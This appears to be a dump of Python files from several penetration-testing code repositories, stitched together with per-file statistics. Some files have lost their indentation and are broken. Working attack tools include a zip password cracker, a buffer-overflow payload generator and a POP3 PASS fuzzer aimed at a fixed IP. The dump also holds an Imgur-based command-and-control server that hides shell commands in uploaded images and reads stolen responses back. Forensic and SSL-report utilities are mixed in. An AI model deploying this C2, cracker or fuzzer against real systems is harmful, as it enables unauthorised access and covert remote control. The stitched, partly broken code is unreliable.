cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
import zipfile
import optparse
from threading import Thread
def extractFile(zFile, password):
    """Try to extract zFile using the given password.

    Returns the password on success, or None when extraction fails
    (wrong password or an unusable password value), so callers can
    tell whether this attempt worked.
    """
    try:
        zFile.extractall(pwd=password)
        print('[+] Found password ' + str(password) + '\n')
        return password
    except Exception:
        # Wrong password (or bad pwd type): stay quiet, the caller tries many.
        # Narrowed from a bare except so Ctrl-C/SystemExit still propagate.
        return None
def main():
    """Parse command-line options and dictionary-attack the zip file."""
    parser = optparse.OptionParser("usage %prog -f <zipfile> -d <dictionary>")
    parser.add_option('-f', dest='zname', type='string',
                      help='specify zip file')
    parser.add_option('-d', dest='dname', type='string',
                      help='specify dictionary file')
    (options, args) = parser.parse_args()
    # Both the archive and the wordlist are mandatory.
    # (Was: (options.zname == None) | (options.dname == None) -- bitwise-or
    # on comparison results; use a plain boolean test.)
    if options.zname is None or options.dname is None:
        print(parser.usage)
        raise SystemExit(0)
    zname = options.zname
    dname = options.dname
    zFile = zipfile.ZipFile(zname)
    passFile = open(dname)
    for line in passFile.readlines():
        password = line.strip('\n')
        # Each attempt runs in its own thread so one slow/failed try does
        # not serialise the whole attack.
        # NOTE(review): all threads share one ZipFile handle; zipfile is not
        # documented as thread-safe -- confirm, or open one handle per thread.
        t = Thread(target=extractFile, args=(zFile, password))
        t.start()
    passFile.close()  # was never closed

if __name__ == '__main__':
    main()
| 23.452381 | 62 | 0.590643 |
Penetration-Testing-with-Shellcode | #!/usr/bin/python
from struct import *
buffer = ''
buffer += 'a'*27
buffer += pack("<Q", 0x0040135f)
f = open("input.txt", "w")
f.write(buffer)
| 17.125 | 32 | 0.625 |
Python-Penetration-Testing-for-Developers | import socket
host = "192.168.0.1"
port = 12346
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.bind((host,port))
s.settimeout(5)
data, addr = s.recvfrom(1024)
print "recevied from ",addr
print "obtained ", data
s.close()
except socket.timeout :
print "Client not connected"
s.close() | 18.3125 | 52 | 0.694805 |
cybersecurity-penetration-testing | #
# This is free and unencumbered software released into the public domain.
#
# Anyone is free to copy, modify, publish, use, compile, sell, or
# distribute this software, either in source code form or as a compiled
# binary, for any purpose, commercial or non-commercial, and by any
# means.
#
# In jurisdictions that recognize copyright laws, the author or authors
# of this software dedicate any and all copyright interest in the
# software to the public domain. We make this dedication for the benefit
# of the public at large and to the detriment of our heirs and
# successors. We intend this dedication to be an overt act of
# relinquishment in perpetuity of all present and future rights to this
# software under copyright law.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
# IN NO EVENT SHALL THE AUTHORS BE LIABLE FOR ANY CLAIM, DAMAGES OR
# OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE,
# ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR
# OTHER DEALINGS IN THE SOFTWARE.
# See http://sleuthkit.org/autopsy/docs/api-docs/3.1/index.html for documentation
# Simple report module for Autopsy.
# Used as part of Python tutorials from Basis Technology - September 2015
import os
import logging
import jarray
from array import *
from java.lang import System
from java.util.logging import Level
from org.sleuthkit.datamodel import TskData
from org.sleuthkit.datamodel import AbstractFile
from org.sleuthkit.datamodel import ReadContentInputStream
from org.sleuthkit.autopsy.casemodule import Case
from org.sleuthkit.autopsy.coreutils import Logger
from org.sleuthkit.autopsy.report import GeneralReportModuleAdapter
from org.sleuthkit.autopsy.report.ReportProgressPanel import ReportStatus
from org.sleuthkit.autopsy.casemodule.services import FileManager
# List of English Language stop words. These words may be
# capitalized in text documents, but provide little probative
# value, therefore they will be ignored if detected during the
# search. Stop words exist in virtually every language and
# many versions of stop words exist. I have put this list together
# over time and found it to be effective in eliminating
# words that are not of interest.
# NOTE: all entries are lower-case; ExtractProperNames lower-cases each
# candidate word before testing membership in this list.
stopWords =["able","about","above","accordance","according",
            "accordingly","across","actually","added","affected",
            "affecting","affects","after","afterwards","again",
            "against","almost","alone","along","already","also",
            "although","always","among","amongst","announce",
            "another","anybody","anyhow","anymore","anyone",
            "anything","anyway","anyways","anywhere","apparently",
            "approximately","arent","arise","around","aside",
            "asking","auth","available","away","awfully","back",
            "became","because","become","becomes","becoming",
            "been","before","beforehand","begin","beginning",
            "beginnings","begins","behind","being",
            "believe","below","beside","besides","between",
            "beyond","both","brief","briefly","came","cannot",
            "cause","causes","certain","certainly","come",
            "comes","contain","containing","contains","could",
            "couldnt","date","different","does","doing","done",
            "down","downwards","during","each","effect","eight",
            "eighty","either","else","elsewhere","end",
            "ending","enough","especially","even","ever",
            "every","everybody","everyone","everything",
            "everywhere","except","fifth","first","five",
            "followed","following","follows","former","formerly",
            "forth","found","four","from","further",
            "furthermore","gave","gets","getting",
            "give","given","gives","giving","goes",
            "gone","gotten","happens","hardly","has","have",
            "having","hence","here","hereafter","hereby",
            "herein","heres","hereupon","hers","herself",
            "himself","hither","home","howbeit","however",
            "hundred","immediate","immediately","importance",
            "important","indeed","index","information",
            "instead","into","invention","inward","itself",
            "just","keep","keeps","kept","know","known",
            "knows","largely","last","lately","later","latter",
            "latterly","least","less","lest","lets","like",
            "liked","likely","line","little","look","looking",
            "looks","made","mainly","make","makes","many",
            "maybe","mean","means","meantime","meanwhile",
            "merely","might","million","miss","more","moreover",
            "most","mostly","much","must","myself","name",
            "namely","near","nearly","necessarily","necessary",
            "need","needs","neither","never","nevertheless",
            "next","nine","ninety","nobody","none","nonetheless",
            "noone","normally","noted","nothing","nowhere",
            "obtain","obtained","obviously","often","okay",
            "omitted","once","ones","only","onto","other",
            "others","otherwise","ought","ours","ourselves",
            "outside","over","overall","owing","page","pages",
            "part","particular","particularly","past","perhaps",
            "placed","please","plus","poorly","possible","possibly",
            "potentially","predominantly","present","previously",
            "primarily","probably","promptly","proud","provides",
            "quickly","quite","rather","readily","really","recent",
            "recently","refs","regarding","regardless",
            "regards","related","relatively","research",
            "respectively","resulted","resulting","results","right",
            "run","said","same","saying","says","section","see",
            "seeing","seem","seemed","seeming","seems","seen",
            "self","selves","sent","seven","several","shall",
            "shed","shes","should","show","showed","shown",
            "showns","shows","significant","significantly",
            "similar","similarly","since","slightly","some",
            "somebody","somehow","someone","somethan",
            "something","sometime","sometimes","somewhat",
            "somewhere","soon","sorry","specifically","specified",
            "specify","specifying","still","stop","strongly",
            "substantially","successfully","such","sufficiently",
            "suggest","sure","take","taken","taking","tell",
            "tends","than","thank","thanks","thanx","that",
            "thats","their","theirs","them","themselves","then",
            "thence","there","thereafter","thereby","thered",
            "therefore","therein","thereof","therere",
            "theres","thereto","thereupon","there've","these",
            "they","think","this","those","thou","though","thought",
            "thousand","through","throughout","thru","thus",
            "together","took","toward","towards","tried","tries",
            "truly","trying","twice","under","unfortunately",
            "unless","unlike","unlikely","until","unto","upon",
            "used","useful","usefully","usefulness","uses","using",
            "usually","value","various","very","want","wants",
            "was","wasnt","welcome","went","were","what","whatever",
            "when","whence","whenever","where","whereafter","whereas",
            "whereby","wherein","wheres","whereupon","wherever",
            "whether","which","while","whim","whither","whod",
            "whoever","whole","whom","whomever","whos","whose",
            "widely","willing","wish","with","within","without",
            "wont","words","world","would","wouldnt",
            "your","youre","yours","yourself","yourselves"]
####################
# Function
# Name: ExtractProperNames
# Purpose: Extract possible proper names from the passed string
# Input: string
# Return: Dictionary of possible Proper Names along with the number of
#         occurrences as a key, value pair
# Usage: theDictionary = ExtractProperNames('John is from Alaska')
####################
def ExtractProperNames(theBuffer):
    """Extract possible proper names from theBuffer.

    A word is considered a possible proper name when it:
      * consists only of the allowed ASCII letters (any other character
        acts as a word separator),
      * is in title case (str.istitle()),
      * is between MIN_SIZE and MAX_SIZE characters long, and
      * its lower-cased form is not in the module-level stopWords list.

    Returns a dictionary mapping each candidate name to the number of
    times it occurs in theBuffer.
    """
    # Characters treated as part of a word; everything else becomes a space.
    # ASCII letters only -- extend this string to widen the search.
    allowedCharacters = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
    # Replace every disallowed character with a space in a single pass.
    # (The original appended one character at a time to a string, which is
    # quadratic on large files; join builds it in linear time.)
    cleaned = ''.join(
        ch if ch in allowedCharacters else ' ' for ch in theBuffer
    )
    wordList = cleaned.split()
    # Proper-name size limits. If MIN_SIZE is reduced, the stopWords list
    # should be extended with shorter stop words.
    MIN_SIZE = 4
    MAX_SIZE = 20
    # Count qualifying words: title case, within the size limits, and not
    # a (lower-cased) stop word. dict.get() keeps the counting in one line.
    properNamesDictionary = {}
    for word in wordList:
        if not word.istitle():
            continue
        if len(word) < MIN_SIZE or len(word) > MAX_SIZE:
            continue
        if word.lower() in stopWords:
            continue
        properNamesDictionary[word] = properNamesDictionary.get(word, 0) + 1
    return properNamesDictionary
# End Extract Proper Names Function
# Class responsible for defining module metadata and logic
class CSVReportModule(GeneralReportModuleAdapter):
    """Autopsy report module that lists possible proper names found in
    .txt files of the current case, ordered by number of occurrences."""

    # This defines the Report name shown in the Autopsy UI.
    moduleName = "Proper Names Report"

    _logger = None

    def log(self, level, msg):
        """Log msg at the given level, tagged with class and calling method."""
        import inspect  # local import: inspect is not imported at file level
        # Lazily create the logger on first use. (The original tested and
        # assigned a bare local `_logger`, which raised NameError and left
        # self._logger forever None.)
        if self._logger is None:
            self._logger = Logger.getLogger(self.moduleName)
        self._logger.logp(level, self.__class__.__name__, inspect.stack()[1][3], msg)

    def getName(self):
        """Return the report module's display name."""
        return self.moduleName

    def getDescription(self):
        """Return the short description shown in the Autopsy report UI."""
        return "Extracts Possible Proper Names"

    def getRelativeFilePath(self):
        """Return the report file name, relative to the report directory."""
        return "prop.txt"

    # The 'baseReportDir' object being passed in is a string
    # with the directory that reports are being stored in.
    # Report should go into baseReportDir + getRelativeFilePath().
    # The 'progressBar' object is of type ReportProgressPanel.
    # See: http://sleuthkit.org/autopsy/docs/api-docs/3.1/classorg_1_1sleuthkit_1_1autopsy_1_1report_1_1_report_progress_panel.html
    def generateReport(self, baseReportDir, progressBar):
        """Scan every non-directory .txt file in the case, extract possible
        proper names and write them (most frequent first) to the report."""
        # Open the output report file.
        fileName = os.path.join(baseReportDir, self.getRelativeFilePath())
        report = open(fileName, 'w')

        # Query the database for the files (ignore the directories).
        sleuthkitCase = Case.getCurrentCase().getSleuthkitCase()
        files = sleuthkitCase.findAllFilesWhere(
            "NOT meta_type = " +
            str(TskData.TSK_FS_META_TYPE_ENUM.TSK_FS_META_TYPE_DIR.getValue()))

        # Set up the progress indicator: one tick per candidate file.
        progressBar.setIndeterminate(False)
        progressBar.start()
        progressBar.setMaximumProgress(len(files))

        for file in files:
            # Limit processing to files with .txt extensions only.
            if file.getName().lower().endswith(".txt"):
                # Accumulate the file's bytes as a Python string.
                fileStringBuffer = ''
                inputStream = ReadContentInputStream(file)
                # Read the file in 1024-byte chunks; read() returns -1 at EOF.
                buffer = jarray.zeros(1024, "b")
                bytesRead = inputStream.read(buffer)
                while (bytesRead != -1):
                    for eachItem in buffer:
                        # Keep only non-negative byte values (Java bytes are
                        # signed, so this drops values >= 0x80).
                        if eachItem >= 0 and eachItem <= 255:
                            fileStringBuffer = fileStringBuffer + chr(eachItem)
                    # NOTE(review): the whole 1024-byte buffer is consumed even
                    # when read() returned fewer bytes, so stale bytes from the
                    # previous chunk can leak into the text on the final read --
                    # confirm and limit to buffer[:bytesRead] if unwanted.
                    bytesRead = inputStream.read(buffer)

                # Extract candidate proper names from the accumulated text.
                properNamesDictionary = ExtractProperNames(fileStringBuffer)

                # Write this file's results, highest occurrence count first.
                report.write("\n\nProcessing File: "+ file.getUniquePath() + "\n\n")
                report.write("Possible Name Occurrences \n")
                report.write("-------------------------------- \n")
                for eachName in sorted(properNamesDictionary,
                                       key=properNamesDictionary.get,
                                       reverse=True):
                    theName = '{:20}'.format(eachName)
                    theCnt = '{:5d}'.format(properNamesDictionary[eachName])
                    report.write(theName + theCnt + "\n")

            # One tick per file examined (whether or not it was processed).
            progressBar.increment()

        # Close the report and mark the progress bar complete.
        progressBar.complete(ReportStatus.COMPLETE)
        report.close()

        # Register the report file with the Case.
        Case.getCurrentCase().addReport(fileName, self.moduleName, "Prop Report")
| 45.668421 | 137 | 0.590255 |
cybersecurity-penetration-testing | #!/usr/bin/python
# -*- coding: utf-8 -*-
from scapy.all import *
def pktPrint(pkt):
if pkt.haslayer(Dot11Beacon):
print '[+] Detected 802.11 Beacon Frame'
elif pkt.haslayer(Dot11ProbeReq):
print '[+] Detected 802.11 Probe Request Frame'
elif pkt.haslayer(TCP):
print '[+] Detected a TCP Packet'
elif pkt.haslayer(DNS):
print '[+] Detected a DNS Packet'
# Sniff on the monitor-mode interface, classifying each captured packet.
conf.iface = 'mon0'
sniff(prn=pktPrint)
| 21.4 | 55 | 0.628635 |
Python-Penetration-Testing-for-Developers | from imgurpython import ImgurClient
import StegoText, random, time, ast, base64
def get_input(string):
    ''' Get input from console regardless of python 2 or 3 '''
    # Python 2 exposes raw_input; on Python 3 (or any failure) fall back
    # to input(), which reads a line the same way there.
    try:
        result = raw_input(string)
    except:
        result = input(string)
    return result
def create_command_message(uid, command):
    """Build the message payload embedding a command for a client.

    Newlines are stripped and the command Base32-encoded so it survives
    being hidden inside an image. Works on Python 2 and 3: the original
    wrapped b32encode() in str(), which yields a "b'...'" wrapper on
    Python 3, and b32encode there requires bytes input.
    """
    data = command.replace('\n', '')
    if not isinstance(data, bytes):
        data = data.encode('ascii')  # b32encode needs bytes on Python 3
    encoded = base64.b32encode(data).decode('ascii')
    return "{'uuid':'" + uid + "','command':'" + encoded + "'}"
def send_command_message(uid, client_os, image_url):
command = get_input(client_os + "@" + uid + ">")
steg_path = StegoText.hide_message(image_url,
create_command_message(uid, command),
"Imgur1.png",
True)
print "Sending command to client ..."
uploaded = client.upload_from_path(steg_path)
client.album_add_images(a[0].id, uploaded['id'])
if command == "quit":
sys.exit()
return uploaded['datetime']
def authenticate():
    """Run the Imgur PIN OAuth flow and return an authenticated client."""
    # Application credentials registered with Imgur.
    api_client = ImgurClient('<YOUR CLIENT ID>', '<YOUR CLIENT SECRET>')
    # Ask the operator to visit the authorization URL and type in the PIN.
    print("Go to the following URL: {0}".format(api_client.get_auth_url('pin')))
    entered_pin = get_input("Enter pin code: ")
    tokens = api_client.authorize(entered_pin, 'pin')
    api_client.set_user_auth(tokens['access_token'], tokens['refresh_token'])
    return api_client
# Command-and-control main loop: authenticate to Imgur and poll the first
# album for steganographic check-in images posted by the client.
client = authenticate()
a = client.get_account_albums("<YOUR IMGUR USERNAME>")
imgs = client.get_album_images(a[0].id)
last_message_datetime = imgs[-1].datetime
print "Awaiting client connection ..."
connected_uuid = ""
loop = True
while loop:
    time.sleep(5)  # poll the album every 5 seconds
    imgs = client.get_album_images(a[0].id)
    # An image newer than the last one processed means a client message.
    if imgs[-1].datetime > last_message_datetime:
        # NOTE(review): imgs[0] here, but imgs[-1] everywhere else -- if the
        # album lists oldest-first this records the wrong timestamp; confirm
        # the intended index.
        last_message_datetime = imgs[0].datetime
        client_dict = ast.literal_eval(StegoText.extract_message(imgs[-1].link, True))
        if client_dict['status'] == "ready":
            print "Client connected:\n"
            print "Client UUID:" + client_dict['uuid']
            print "Client OS:" + client_dict['os']
        else:
            print base64.b32decode(client_dict['response'])
        # NOTE(review): the result of this expression is discarded -- it makes
        # an extra API call with no visible effect; confirm it can be removed.
        random.choice(client.default_memes()).link
        last_message_datetime = send_command_message(client_dict['uuid'],
                                                     client_dict['os'],
                                                     random.choice(client.default_memes()).link)
| 33.041096 | 96 | 0.594605 |
cybersecurity-penetration-testing | import csv_writer
import xlsx_writer
# Module metadata for the UserAssist parser package.
__author__ = 'Preston Miller & Chapin Bryce'
__date__ = '20151012'
__version__ = 0.04
__description__ = 'This scripts parses the UserAssist Key from NTUSER.DAT.'
PenetrationTestingScripts | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author : jeffzhang
# @Time : 18-5-19
# @File : domain_brute.py
# @Desc : ""
import dns.resolver
from multiprocessing import Pool, Lock
from datetime import datetime
from random import sample
from string import digits, ascii_lowercase
from fuxi.views.lib.mongo_db import connectiondb, db_name_conf
from fuxi.views.lib.get_title import get_title
from instance import config_name
# Serialises MongoDB writes performed from the worker pools below.
lock = Lock()
# Collection names resolved from the shared Fuxi configuration.
domain_db = db_name_conf()['domain_db']
config_db = db_name_conf()['config_db']
subdomain_db = db_name_conf()['subdomain_db']
def resolution(domain):
    """Resolve *domain* and return {domain: [record strings]}.

    A and CNAME answers are collected in separate lists; the dict value is
    the list for whichever record type was seen most recently while walking
    the answer section. Returns an empty dict when resolution fails.
    """
    _result = {}
    record_a = []
    record_cname = []
    try:
        respond = dns.resolver.query(domain.strip())
        for record in respond.response.answer:
            for i in record.items:
                if i.rdtype == dns.rdatatype.from_text('A'):
                    record_a.append(str(i))
                    _result[domain] = record_a
                elif i.rdtype == dns.rdatatype.from_text('CNAME'):
                    record_cname.append(str(i))
                    _result[domain] = record_cname
    except Exception as e:
        # Best effort: NXDOMAIN, timeouts etc. simply yield an empty result.
        # print(e)
        pass
    return _result
class DomainBrute:
    """Brute-force subdomains of one target domain with a worker pool.

    Wordlists and the pool size come from the Fuxi config collection;
    subdomains that resolve (and are not wildcard answers) are written
    to the subdomain collection.
    """
    def __init__(self, domain, domain_id):
        self.domain = domain
        self.domain_id = domain_id
        self.sub_domain = []  # candidate names built by domain_handle()
        # "Enable" turns on third-level (a.b.example.com) brute forcing.
        self.third_domain = connectiondb(domain_db).find_one({"_id": domain_id})['third_domain']
        self.resolver_ip = ''
        self.result = ''
        self.thread = int(connectiondb(config_db).find_one({"config_name": config_name})['subdomain_thread'])
        self.subdomain_dict_2 = connectiondb(config_db).find_one({"config_name": config_name})['subdomain_dict_2']
        self.subdomain_dict_3 = connectiondb(config_db).find_one({"config_name": config_name})['subdomain_dict_3']
        # Random label used by resolver_check() to detect wildcard DNS.
        self.random_subdomain = ''.join(sample(digits + ascii_lowercase, 10)) + '.' + domain
    def domain_handle(self):
        """Expand the wordlists into the full list of candidate subdomains."""
        for sub_domain_2 in self.subdomain_dict_2:
            self.sub_domain.append(sub_domain_2.strip() + '.' + self.domain)
        if self.third_domain == "Enable":
            for sub_domain_3 in self.subdomain_dict_3:
                for sub_domain_2 in self.subdomain_dict_2:
                    sub_domain = sub_domain_3 + "." + sub_domain_2
                    self.sub_domain.append(sub_domain.strip() + '.' + self.domain)
        return self.sub_domain
    def resolver_check(self):
        """Resolve a random label: an answer implies wildcard DNS.

        Returns that wildcard answer (record list) or False.
        """
        try:
            var = resolution(self.random_subdomain)
            if var[self.random_subdomain]:
                return var[self.random_subdomain]
            else:
                return False
        except Exception as e:
            # Missing key / resolution failure means no wildcard.
            # print(e)
            return False
    def multi_brute(self):
        """Resolve every candidate in parallel and store non-wildcard hits."""
        start_date = datetime.now()
        self.resolver_ip = self.resolver_check()
        pool = Pool(processes=self.thread)
        result = []
        for sub_domain in self.domain_handle():
            result.append(pool.apply_async(resolution, (sub_domain,)))
        pool.close()
        pool.join()
        for res in result:
            self.result = res.get()
            for subdomain in self.result:
                # Skip wildcard answers (identical to the random label's).
                if self.result[subdomain] != self.resolver_ip:
                    data = {
                        "subdomain": subdomain,
                        "domain": self.domain,
                        "domain_id": self.domain_id,
                        "date": datetime.now().strftime("%Y-%m-%d %H:%M:%S"),
                        "result": self.result[subdomain],
                        "title": '',
                    }
                    lock.acquire()
                    try:
                        connectiondb(subdomain_db).insert_one(data)
                        # print(self.result, var)
                    except Exception as e:
                        print("save_db error", e)
                    lock.release()
        scan_time = datetime.now() - start_date
        print("++++++++++ Scan Done! ++++++++++", scan_time.total_seconds())
def start_domain_brute(domain, domain_id):
    """Brute-force every domain in the task, tracking status in MongoDB."""
    connectiondb(domain_db).update_one(
        {"_id": domain_id}, {"$set": {"status": "Running"}})
    # One DomainBrute run per target domain.
    for target in domain:
        DomainBrute(target, domain_id).multi_brute()
    connectiondb(domain_db).update_one(
        {"_id": domain_id}, {"$set": {"status": "Done"}})
    # Resolve page titles for everything that was discovered.
    get_domain_title(domain_id)
def get_domain_title(domain_id):
    """Fetch HTTP titles for every stored subdomain of a task (50 workers)."""
    worker_pool = Pool(processes=50)
    pending = [
        worker_pool.apply_async(get_title, (doc['subdomain'], doc['_id']))
        for doc in connectiondb(subdomain_db).find({"domain_id": domain_id})
    ]
    worker_pool.close()
    worker_pool.join()
    # Write the collected titles back, one at a time under the shared lock.
    for task in pending:
        lock.acquire()
        try:
            connectiondb(subdomain_db).update_one(
                {"_id": task.get()["_id"]},
                {"$set": {"title": task.get()['title']}})
        except Exception as e:
            print("update title error", e)
        lock.release()
owtf | #!/usr/bin/env python
from __future__ import print_function
import json
import os
import sys
import traceback
from template import RESULTS
from owtf.utils.file import FileOperations
# Refuse to run without an existing input file argument.
if not os.path.isfile(sys.argv[1]):
    sys.exit(1)
data = None
try:
    # NOTE(review): json.loads() is applied to the *file name* rather than the
    # file's contents, so a normal "<host>.json" argument raises here and the
    # script exits; presumably the intent was to parse the opened file's
    # contents -- confirm against FileOperations.open's semantics.
    data = FileOperations.open(json.loads(str(sys.argv[1])))
except Exception:
    sys.exit(1)
if data is None:
    sys.exit(1)
# "example.com.json" -> "example.com"; used to name the HTML report.
org_name = str(sys.argv[1]).split(".json", 1)[0]
try:
    # An assessment-level error means there is nothing to render.
    if data[0]["status"] == "ERROR":
        print("[-] SSLLabs scan finished with errors")
        sys.exit(0)
except IndexError:
    print("Wrong format detected, exiting...")
    sys.exit(0)
print("RESULT IN SSL_TLS_TESTING_FUNCTIONALITY_FROM_SSLLABS_REPORT.html")
try:
    with open(org_name + "_report.html", "w") as f:
        # Fill the HTML template placeholders from the first host's first
        # endpoint in the SSL Labs JSON.
        content = RESULTS
        content = content.replace("{{host}}", data[0]["host"])
        content = content.replace("{{status_code}}", str(data[0]["endpoints"][0]["details"]["httpStatusCode"]))
        content = content.replace("{{ip_address}}", data[0]["endpoints"][0]["ipAddress"])
        content = content.replace("{{grade}}", data[0]["endpoints"][0]["grade"])
        content = content.replace("{{secondary_grade}}", data[0]["endpoints"][0]["gradeTrustIgnored"])
        content = content.replace("{{freak}}", str(data[0]["endpoints"][0]["details"]["freak"]))
        content = content.replace("{{poodle}}", str(data[0]["endpoints"][0]["details"]["poodleTls"]))
        # renegSupport value 1 -> insecure renegotiation, 2 -> secure (below).
        insecureRenegotiationSuported = "true" if data[0]["endpoints"][0]["details"]["renegSupport"] == 1 else "false"
        content = content.replace("{{insecure_reneg}}", insecureRenegotiationSuported)
        content = content.replace("{{openssl_ccs}}", str(data[0]["endpoints"][0]["details"]["openSslCcs"]))
        if "dhUsesKnownPrimes" in data[0]["endpoints"][0]["details"]:
            insecureDH = "true" if data[0]["endpoints"][0]["details"]["dhUsesKnownPrimes"] == 2 else "false"
            content = content.replace("{{insecure_dh}}", insecureDH)
        # One heading per supported SSL/TLS protocol version.
        protocol_str = ""
        for protocol in data[0]["endpoints"][0]["details"]["protocols"]:
            protocol_str += "<h2> Protocol SSL/TLS version supported : </h2>" + protocol["name"] + " " + protocol[
                "version"
            ]
        content = content.replace("{{protocol}}", protocol_str)
        certificate_exp = "true" if data[0]["endpoints"][0]["details"]["chain"]["issues"] == 2 else "false"
        content = content.replace("{{cert_exp}}", certificate_exp)
        selfSigned = "true" if data[0]["endpoints"][0]["details"]["cert"]["issues"] == 64 else "false"
        content = content.replace("{{self_signed}}", selfSigned)
        content = content.replace("{{rc4}}", str(data[0]["endpoints"][0]["details"]["supportsRc4"]))
        content = content.replace("{{fwd_sec}}", str(data[0]["endpoints"][0]["details"]["forwardSecrecy"]))
        secureRenegotiationSuported = "true" if data[0]["endpoints"][0]["details"]["renegSupport"] == 2 else "false"
        content = content.replace("{{sec_reneg}}", secureRenegotiationSuported)
        # Per-certificate chain issues; the legend in the emitted string
        # documents the issue bit meanings.
        cert_chains = ""
        for chainCert in data[0]["endpoints"][0]["details"]["chain"]["certs"]:
            cert_chains += "<h2> Chain Cert issue: </h2>" + str(
                chainCert["issues"]
            ) + "(1:certificate not yet valid,2:certificate expired,4:weak key,8:weak signature,16:blacklisted)"
            weakKey = "true" if chainCert["issues"] == 4 else "false"
            weakSignature = "true" if chainCert["issues"] == 8 else "false"
            cert_chains += "<h2> Weak private key: </h2>" + weakKey
            cert_chains += "<h2> Weak certificate: </h2>" + weakSignature
        content = content.replace("{{cert_chains}}", cert_chains)
        f.write(content)
    print("Done. Report write successful.")
except:
    print("Something went wrong when parsing result")
    print(traceback.format_exc())
    sys.exit(0)
sys.exit(0)
| 40.568421 | 118 | 0.611196 |
Hands-On-Penetration-Testing-with-Python | #!/usr/bin/python
import socket
buffer=["A"]
counter=100
while len(buffer)<=30:
buffer.append("A"*counter)
counter=counter+200
for string in buffer:
print"Fuzzing PASS with %s bytes" % len(string)
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
connect=s.connect(('192.168.250.137',110))
data=s.recv(1024)
#print str(data)
s.send('USER root\r\n')
data=s.recv(1024)
print str(data)
s.send('PASS ' + string + '\r\n')
s.send('QUIT\r\n')
s.close()
| 17.964286 | 54 | 0.596226 |